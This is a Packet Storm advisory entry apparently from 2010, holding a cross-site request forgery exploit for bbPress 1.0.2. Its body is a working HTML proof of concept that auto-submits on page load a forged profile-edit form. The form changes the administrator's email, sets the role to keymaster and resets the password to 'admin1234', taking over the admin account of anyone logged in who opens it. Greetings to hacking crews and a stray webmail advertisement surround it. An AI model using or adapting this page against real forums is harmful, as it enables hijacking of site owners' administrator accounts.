bbPress 1.0.2 Cross Site Request Forgery

2010-06-30T00:00:00
ID PACKETSTORM:91306
Type packetstorm
Reporter saudi0hacker
Modified 2010-06-30T00:00:00

Description

                                        
                                            `  
  
  
: # Software : bbPress v 1.0.2 CSRF  
: # site : www.bbpress.org   
: # date : 29/6/2010   
: # Author : saudi0hacker   
: # Date : May 25, 2010   
: # Type : CSRF   
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com  
  
  
<html>  
<body onload="document.forms['Login'].submit();">  
<form method="post" name = "Login" action="http://localhost/bb/profile.php?id=1&tab=edit">  
  
<select type="hidden" name="display_name" id="display_name">  
<option type="hidden" id="display_displayname" value="admin">admin</option>  
<input type="hidden" name="user_email" id="user_email" value="admin@sss.com" />  
<input id="_wpnonce" name="_wpnonce" value="98dfb69b68" /><input type="hidden" name="_wp_http_referer" value="/bb/profile.php?id=1&tab=edit" />  
<select type="hidden" id="admininfo_role" name="role">  
<option value="keymaster" selected="selected">Key Master</option>  
<input name="pass1" type="hidden" value= "admin1234" id="pass1" autocomplete="off" />  
<input name="pass2" type="hidden" value= "admin1234" id="pass2" autocomplete="off" />  
<input type="submit" name="Submit" value="save" />  
  
  
_________________________________________________________________  
Hotmail: Free, trusted and rich email service.  
https://signup.live.com/signup.aspx?id=60969  
  
  
`